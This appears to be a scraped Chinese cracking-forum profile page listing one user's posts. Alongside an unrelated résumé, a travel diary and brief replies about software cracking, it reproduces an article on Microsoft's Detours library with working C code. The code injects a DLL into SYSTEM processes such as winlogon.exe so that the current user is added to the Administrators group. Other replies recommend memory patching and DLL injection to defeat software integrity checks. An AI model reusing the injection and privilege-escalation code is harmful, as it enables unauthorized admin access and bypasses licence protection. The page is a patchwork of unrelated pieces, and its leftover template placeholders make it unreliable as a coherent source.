|
|
|
被人忘却的DOS平台全套SMC技术!
此作者个人简历: Objective To gain employment as a software developer with a cutting-edge company. Degree 12/2000 North Carolina State University, Raleigh NC B.S. degree in Computer Science Relevant Courses Computer Graphics - Concentrated on the mathematics of 3D computer graphics. - Programming assignments in C using OpenGL. Computer Graphics Projects - Concentrated on graphics algorithms and implementation. - Programming assignments in C with minimal use of OpenGL. - Implemented a direct volume renderer for the course's final project. Introduction to Artificial Intelligence - Learned basic techniques for AI, concentrating on search-based algorithms. - Programming assignments in Common Lisp. Technical Skills Languages: C, C++, x86 Assembly Language, Common Lisp, Scheme, Perl, Java, Forth X Windows Programming using both Xlib and GTK+ Unix device driver development. Graphics APIs: OpenGL, GLUT, SDL, VTK Published "Extending DOS Executables" in Issue No. 7 of the Assembly Programming Journal Business Experience 5/2001 - 7/2003 Tech Source Inc., Altamonte Springs FL Software Engineer, Device Driver Group - Developed PCI graphics card device drivers for Linux and Solaris. This included kernel level programming and close cooperation with the XServer developers. - Developed Solaris firmware for Tech Source's graphics cards using Sun's OpenBoot firmware architecture. - Part of a major project to support Tech Source's graphics cards on OpenVMS. Ported device drivers, set up the development environment, and learned the ins-and-outs of OpenVMS, all in close collaboration with Compaq. - Ported kernel modules for Linux kernel 2.2.x to the 2.4 kernel. - Researched and developed a Solaris application to monitor filesystem events. - Assisted in adding Japanese language support to a large application. - Miscellaneous Linux duties (rpm packaging, 3D/DRI setup). 7/2000 - 4/2001 Condensed Matter Theory Group at NCSU, Raleigh NC Programmer - Worked independently to develop a Linux application to visualize electron density volume data. All Development was done in C using the GNU tools and GTK+. - Responsible for a major rewrite of the group's molecular visualization tool, Rotmovie. I ported the old Rotmovie from C to C++ and rewrote all of the graphics functions to make use of The Visualization Toolkit(VTK). I also added a considerable amount of functionality to the program, such as the ability to view electron density isosurfaces. In addition, I rewrote the graphical user interface to use GTK+. 1/1999 - 8/1999 Object Technology International, Raleigh, NC Co-op - Helped design, test, and implement a GUI framework for embedded Java. - Worked on a Linux/X Windows port of a graphics library for embedded systems. Summer 1998 Red Hat Software, Durham, NC Intern - Wrote Perl scripts to simplify web and system administration tasks. - Assisted QA team with bug testing and fixing. Summer 1997 Jackson Technical Services, Monroe, NC Intern - C programming in a DOS development environment. - Wrote modules to extend the capabilities of a large database. |
|
被人忘却的DOS平台全套SMC技术!
关于此文作者来北京的经历: A Trip to China Tuesday, May 22 Arrival in Beijing We arrived in Beijing after a relatively uneventful 13 hour flight. The only interesting event was the scenery as we flew over Siberia. That is one inhospitable place! We arrived at the Beijing airport at approximately 2:00 PM. My exhaustion due to the long flight was exceeded only by my excitement at finally being in China. The first thing I noticed as we left the airport were the huge billboards plastered with images of Arnold Schwarzneger hawking various electronic appliances. Absolutely hilarious! It turns out that Arnold would follow us all over China. After stoping off at the hotel, we went out to grab some food and have a look around the city. First off, we took a cab to The Qianmen area just south of Tiananmen Square. We would come back to this area a lot as it had lots of shopping, an internet cafe, and Western resturants(McDonalds and KFC!). Tonight though, we weren't looking for western food. We ate at the famous Peking Duck instead. Both Richard Nixon and Fidel Castro had eaten at this resturant in the past, and I must say that I thought the food was excellent, not to mention cheap considering its quality. I also had my first taste of Beijing Beer, an excellent chinese rice-based beer. Wednesday, May 23 Temple of Heaven, Forbidden City We all woke up ridiculously early, approx. 4:00 AM(our internal clocks were completely screwed up due to the time difference), so we headed out to the Temple of Heaven park at about 5:30 or so. Personally, I was mainly hoping to see people practicing Taijiquan. The park itself is a large area dotted with trees and crisscrossed by dirt and stone paths surrounding the Temple of Heaven(Tiantan). Spread throughout the park were chinese people of all ages practicing Qigong or Taijiquan, meditating, and playing badmitton. Yells and grunts from practitioners of martial arts carried through the trees as elderly chinese men and women moved silently and gracefully through the postures of Taijiquan. We were the only Westerners in sight. After a while, with a little encouragement from Ran and Todd, I gathered the nerve to join in with a large group practicing Taiji. I did not know the form they were practicing, it may have been Chen style, but I did the best that I could. Afterwards, I found a place by myself and practiced the first 2 sections of the style I'm learning, 108 Wudang Mountain Taijiquan. I attracted a number of interested observers. Of course, I can't speak chinese but Ran explained to them that I studied Taiji back in the States. It was a neat experience, and I'm glad I had a chance to practice Taiji amongst the chinese people. After a while, we left the park and began to make our way down a long, elevated, stone road towards the temple. More people were practicing Taiji along the road and one group in particular was very interesting. They were all carrying swords and were being led through the form by an impressive looking chinese man who carried his sword like he knew how to use it. After waiting a few minutes for the ticket office to open, we bought our tickets to the Temple of Heaven. Both me and Todd were surprised at the cheap cost of admission, being used to American prices. The temple was pretty, a nice example of chinese architecture, but to me it wasn't as exciting as the nearby park. After lunch we headed out to the Forbidden City. Thursday, May 24 The Great Wall Friday, May 25 Train Station It was crowded and it smelt funny, but I shouldn't complain. You go to the train station for cheap-ass transportation and nothing more. Well, if my chinese was better I probably could have enjoyed the company of the other travelers. We took an overnight sleeper to Tai Shan, about an 8 hour train ride. Saturday, May 26 Tai Shan We arrived at the base of Tai Shan at approximately 7:00 AM, and were greeted by a somewhat dirty little town, nothing at all like the modern face which Beijing presented. Although the city and hotel were somewhat disappointing, the mountain itself would not leave us dissatisfied. Tai Shan is an absolutely magical place. The bottom portion of the 6,293 step stairway up the mountainside would prove to be quite a bit easier than the latter stages, though it seemed difficult enough at the time. This bottom portion was sprinkled with Taoist(and a few Buddhist) shrines, tombstone-like stones engraved with beautiful calligraphy, and the merchant stands which are a consistent presence throughout the journey. The mountain itself is a microcosm of chinese culture, history, spirituality, and entrepreneurship. As we marched up the mountain everything became more and more beautiful: the calligraphy, the lush mountain vistas, everything. To me, the calligraphy was especially beautiful. Most of it was chiseled into rock faces and painted red. The most magnificent of all was a poem carved into a sheer cliff face several hundred feet from the path. Each character is nearly one meter wide and I imagine that the whole poem must have been over one hundred feet tall and half as many wide. Also noteworthy were a couple of poems by Chairman Mao. When we finally made it to the summit, after nearly 6 hours of hiking, it was as if we had stepped into another world, or perhaps a fairy tale. The view of the surrounding mountains and the path that lead us there was exquisite. We stayed at the top long enough to explore the village, take some pictures, and watch the sunset. The trip down in the dark proved to be a bit harrowing, but luckily we managed to catch a bus at the halfway point. All in all, 8.5 hours of climbing. The whole trip was so invigorating. The closer to the top I got, the looser my muscles became and the more energy I had. Until, once I reached Sky Road at the summit, I was bounding up steps. Sunday, May 27 - Friday, June 1 Shanghai Shanghai is awesome. Our hotel here is badass, and we have satelitte TV! At 14 million people, this is the biggest city I've been to. In a lot of ways, its similar to how I picture New York, only without the crime and a lot cheaper. There are tall buildings everywhere, many of them lit up in interesting colors at night. Another thing you notice quickly about Shanghai is that there are shopping malls everywhere. There are giant 10 story malls, underground malls, street malls, and basically every other type of mall except for the American strip-mall. Saturday, June 2 Guilin Today we took a boat ride down the famous Lijiang, and it is easy to see how this area became known as one of the most beautiful locations on Earth. We were especially fortunate today because it was rainy and misty, the best weather for a sight-seeing trip down the Lijiang. The mist hung low over and between the karst formations, lending an otherworldly and mysterious air to the already beautiful landscape. In addition to the boat ride, we stopped to explore Crown Cave. Crown Cave is the 2nd largest of the caves in the area, and like most of them, it is filled with odd rock formations such as: a six-fingered hand, a parrot, a bear, a turtle, a frog, a monkey atop a column, plus many others. It was really strange how closely the formations resembled real-life objects. It was all made even more beautiful by the colored lights that were placed around the cave. Another neat feature of the cave was an underground river. Several rock bridges spanned the river and we also got to take a boat ride down a section of it. The whole underground exploration thing reminded me of years I spent playing Dungeons and Dragons as a kid. After returning from our cruise, we met up with the cabbie who took us to Guilin from the airport and went out to dinner. Cab drivers in China are great, not only do they drive you around, they know the city better than anyone and often serve as travel agents. Our cabbie took us to a nice chinese resturaunt, got us a private room there, and actually had dinner with us! Speaking of dinner, it turned out to be quite an experience. At the front of the resturaunt were various cages and tanks holding an assortment of animals(dishes). In order to prove that their food was fresh, the customer goes with the waiter and selects the animal(s) he wants to eat and watches the waiter kill it(them) right before his eyes. We sentenced one crab, a rare subterranean fish, a chicken, and a rodent-like thing that we think was a chinchilla to death. We were gonig to order rabbit, but it was just too cute. Overall, the food was good, but different from what I'm accustomed. Sunday, June 3 Guilin We rented our cabbie from the night before for the day and she took us to various tourist sights within the city, the coolest of which was Reed Flute Cave. Since I've already talked about caves, I'll just say the it was pretty similar to Crown Cave. After driving around town for a while we went to KFC and then to the airport to catch our flight to Hainan island. Monday, June 4 Hainan Hainan Island is China's version of Hawaii. Its tropical, the water is clear and warm, and there are lush mountains all over the island. Actually, Hainan is better than hawaii because its a lot cheaper and a lot less crowded. I've never been to Hawaii, but Todd has and he says that Hainan beats the pants off Hawaii. Our hotel is magnificent and only $90 a night, of which my share is $45(Todd and I are sharing a room to save money). Our room has an ocean facing patio which is really nice. I'm actually writing this from the patio. The mood out here is very conducive to writing. You can hear the soft rumble of the waves and the view is spectacular. I've filled in a couple of journal entries while sitting out here. Tuesday, June 5 Hainan Today, we hung out at the hotel/beach all day. We also played a lot of chinese chess, including a 4.5 hour marathon between Todd and I which ended in a stalemate. I got a little sunburnt, but thats OK. Wednesday, June 6 Hainan After two days of rest, it was time for a little adventure. On the slate for today is the minority village, the shooting range, and scuba diving. The minority village is sort of like an indian reservation in America. I think there were 3 different minority groups living in this particular village. It was a lot of fun learning about the customs and cultures of these chinese minorities. We got to see lots of neat performances as well as partake in a marriage ceremony(something that our girlfriends would take issue with later)! The next stop was the shooting range, where we got to live out a variety of testosterone-induced fantasies. Both Todd and I tried our hand at firing AK-47's while Ran fired a couple of rounds from a 17mm anti-aircraft gun! Thursday, June 7 Back to Beijing |
|
为什么加壳软件大家都用汇编写呢,
用。NET写 |
|
|
|
PB写的程序如何调试
搜索论坛,有调试器 |
|
怎么能修改家壳软件啊。
最初由 樱花散落 发布 搜索伪装 |
|
|
|
detours 2.0
好东西, 用DETOURS库获取NT管理员权限 陈志敏 ---- Detours是微软开发的一个函数库(源代码可在http://research.microsoft.com/sn/detours 免费获得), 用于修改运行中的程序在内存中的影像,从而即使没有源代码也能改变程序的行为。具体用途是: 拦截WIN32 API调用,将其引导到自己的子程序,从而实现WIN32 API的定制。 为一个已在运行的进程创建一新线程,装入自己的代码并运行。 ---- 本文将简介Detours的原理,Detours库函数的用法, 并利用Detours库函数在Windows NT上编写了一个程序,该程序能使有“调试程序”的用户权限的用户成为系统管理员,附录利用Detours库函数修改该程序使普通用户即可成为系统管理员(在NT4 SP3上)。 一. Detours的原理 ---- 1. WIN32进程的内存管理 ---- 总所周知,WINDOWS NT实现了虚拟存储器,每一WIN32进程拥有4GB的虚存空间, 关于WIN32进程的虚存结构及其操作的具体细节请参阅WIN32 API手册, 以下仅指出与Detours相关的几点: ---- (1) 进程要执行的指令也放在虚存空间中 ---- (2) 可以使用QueryProtectEx函数把存放指令的页面的权限更改为可读可写可执行,再改写其内容,从而修改正在运行的程序 ---- (3) 可以使用VirtualAllocEx从一个进程为另一正运行的进程分配虚存,再使用 QueryProtectEx函数把页面的权限更改为可读可写可执行,并把要执行的指令以二进制机器码的形式写入,从而为一个正在运行的进程注入任意的代码 ---- 2. 拦截WIN32 API的原理 ---- Detours定义了三个概念: ---- (1) Target函数:要拦截的函数,通常为Windows的API。 ---- (2) Trampoline函数:Target函数的复制品。因为Detours将会改写Target函数,所以先把Target函数复制保存好,一方面仍然保存Target函数的过程调用语义,另一方面便于以后的恢复。 ---- (3) Detour 函数:用来替代Target函数的函数。 ---- Detours在Target函数的开头加入JMP Address_of_ Detour_ Function指令(共5个字节)把对Target函数的调用引导到自己的Detour函数, 把Target函数的开头的5个字节加上JMP Address_of_ Target _ Function+5作为Trampoline函数。例子如下: 拦截前:Target _ Function: ;Target函数入口,以下为假想的常见的子程序入口代码 push ebp mov ebp, esp push eax push ebx Trampoline: ;以下是Target函数的继续部分 …… 拦截后: Target _ Function: jmp Detour_Function Trampoline: ;以下是Target函数的继续部分 …… Trampoline_Function: ; Trampoline函数入口, 开头的5个字节与Target函数相同 push ebp mov ebp, esp push eax push ebx ;跳回去继续执行Target函数 jmp Target_Function+5 ---- 3. 为一个已在运行的进程装入一个DLL ---- 以下是其步骤: ---- (1) 创建一个ThreadFuction,内容仅是调用LoadLibrary。 ---- (2) 用VirtualAllocEx为一个已在运行的进程分配一片虚存,并把权限更改为可读可写可执行。 ---- (3) 把ThreadFuction的二进制机器码写入这片虚存。 ---- (4) 用CreateRemoteThread在该进程上创建一个线程,传入前面分配的虚存的起始地址作为线程函数的地址,即可为一个已在运行的进程装入一个DLL。通过DllMain 即可在一个已在运行的进程中运行自己的代码。 二. Detours库函数的用法 ---- 因为Detours软件包并没有附带帮助文件,以下接口仅从剖析源代码得出。 ---- 1. PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction) ---- 功能:从一DLL中找出一函数的入口地址 ---- 参数:pszModule是DLL名,pszFunction是函数名。 ---- 返回:名为pszModule的DLL的名为pszFunction的函数的入口地址 ---- 说明:DetourFindFunction除使用GetProcAddress外,还直接分析DLL的文件头,因此可以找到一些GetProcAddress找不到的函数入口。 ---- 2. DETOUR_TRAMPOLINE(trampoline_prototype, target_name) ---- 功能:该宏把名为target_name 的Target函数生成Trampoline函数,以后调用 trampoline_prototype在语义上等于调用Target函数。 ---- 3. BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour) ---- 功能:用Detour 函数拦截Target函数 ---- 参数:pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函数的入口地址。 ---- 4. BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour) ---- 功能:恢复Target函数 ---- 参数:pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函数的入口地址。 ---- 5. BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName) ---- 功能:为一个已在运行的进程装入一个DLL ---- 参数:hProcess是进程的句柄,lpDllName是要装入的DLL名 三. 程序实例 ---- 以一个能使有“调试程序”的用户权限的用户成为系统管理员的程序做例子说明Detours 库函数的用法。程序的设计思路是找一个以System帐号运行的进程,如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等,使用ContinueProcessWithDll在其中注入把当前用户加入到 Administrators本地组的DLL,因为该DLL在这些进程的安全上下文环境运行,所以有相应的权限。 ---- 先编写相应的DLL: /*admin.dll, 当进程装入时会把名为szAccountName 的用户加入到Administrators本地组。*/ #include #include #include #include /*以下创建一共享段实现进程间的数据通讯, szAccountName 是用户名,bPrepared说明 szAccountName是否已初始化。*/ #pragma data_seg(".MYSHARE") BOOL bPrepared=FALSE; wchar_t szAccountName[100]={0}; #pragma data_seg() #pragma comment(linker, "/SECTION:.MYSHARE,RWS") /*程序调用SetAccountName设置要加入到Administrators 本地组的用户名,并通知DllMain 已初始化szAccountName , 以后被装入时可调用ElevatePriv */ __declspec(dllexport) VOID WINAPI SetAccountName(wchar_t *Name) { wcscpy(szAccountName,Name); bPrepared=TRUE; } /*把名为szAccountName的用户加入 到Administrators本地组*/ __declspec(dllexport) VOID WINAPI ElevatePriv() { LOCALGROUP_MEMBERS_INFO_3 account; account.lgrmi3_domainandname=szAccountName; NetLocalGroupAddMembers(NULL,L"Administrators", 3,(LPBYTE)&account,1); } __declspec(dllexport) ULONG WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, PVOID lpReserved) { switch (dwReason) { case DLL_THREAD_ATTACH: if (bPrepared) ElevatePriv(); } return TRUE; } 程序如下: /*AddMeToAdministrators.exe 把当前用户加入到 Administrators本地组。使用方法为:(1) ---- 运行任务管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的进程ID (2)执行AddMeToAdministrators.exe procid, 其中procid为(1)记下的进程ID (3)签退再签到,运行用户管理器,即可发现自己已在Administrators本地组中。*/ #include #include #include #include #include extern VOID WINAPI SetAccountName(wchar_t *Name); /* GetCurrentUser得到自己的用户名称*/ void GetCurrentUser(wchar_t *szName) { HANDLE hProcess, hAccessToken; wchar_t InfoBuffer[1000],szAccountName[200], szDomainName[200]; PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer; DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200; SID_NAME_USE snu; hProcess = GetCurrentProcess(); OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken); GetTokenInformation(hAccessToken,TokenUser, InfoBuffer, 1000, &dwInfoBufferSize); LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName, &dwAccountSize,szDomainName, &dwDomainSize, &snu); wcscpy(szName,szDomainName); wcscat(szName,L"\"); wcscat(szName,szAccountName); } /* EnablePrivilege启用自己的“调试程序”的用户权限*/ BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable) { HANDLE hToken; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE; TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; LookupPrivilegeValue(NULL, szPrivName, &tp.Privileges[0].Luid); tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0; AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); return((GetLastError() == ERROR_SUCCESS)); } int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR lpszCmdLine, int nCmdShow) { INT argc; WCHAR **argv; argv = CommandLineToArgvW(GetCommandLineW(), &argc); INT nProcessId = -1; if (argc!=2){ wprintf(L"usage %s pid", argv[0]); return 1; } nProcessId = _wtoi(argv[1]); printf("%d ",nProcessId); ---- /*要成功执行ContinueProcessWithDll,要对winlogon.exe等进程的进程句柄有读写存储器内容和创建线程的权限,EnablePrivilege使本进程有这样的权利。*/ if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){ printf("AdjustTokenPrivilege Fail %u ", (UINT)GetLastError()); return 1; } HANDLE gNewHandle = OpenProcess(PROCESS_ALL_ACCESS , TRUE, nProcessId); if (!gNewHandle){ printf("OpenProcess Fail %u ", (UINT)GetLastError()); return 1; } wchar_t szName[100]; GetCurrentUser(szName); SetAccountName(szName); If (!ContinueProcessWithDll(gNewHandle, L"c:\temp\admin.dll")) { printf("ContinueProcessWithDll failed %u", (UINT)GetLastError()); return 3; } return 0; } ---- 因为“调试程序”的用户权限缺省情况下仅赋予给管理员,因此并不会造成安全漏洞。但该程序揭示出“调试程序”的用户权限其实是至高无上的用户权限,只能授予给可信用户。 四. 结论 ---- Detours是一强大的工具,提供了简单易用的函数接口来拦截WIN32 API调用和为一个已在运行的进程装入一个DLL。 |
|
|
|
不知道有没有一种可以将执行文件中的指定代码段提取出来的工具?
有这样的制作方式注册机,bbs.5icrack.com 出的。 |
|
[原创]启动画面修改工具InnoCustomize注册算法分析
用万能断电不就OK了,还用DEDE。 |
|
EncryptPE 2004.8.10 SpecialEdition
8.10能够注入的话,没道理新版不会被注入了 |
|
[求助]昨天用IDA破解了几个PPC的程序,但是很郁闷。。。。。。
有吧。PPC只是个机型,系统是WINDOW CE |
|
|
|
改 dll文件引起的问题
最初由 dsxu8 发布 外挂的话,EXE,DLLd都开始带MD5效验的,内存PATCH算了,或者注入PATCH。都可以,教学也有不少。 |
|
那位大虾来看看这个dll文件
内存PATCH |
|
改 dll文件引起的问题
自效验 |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值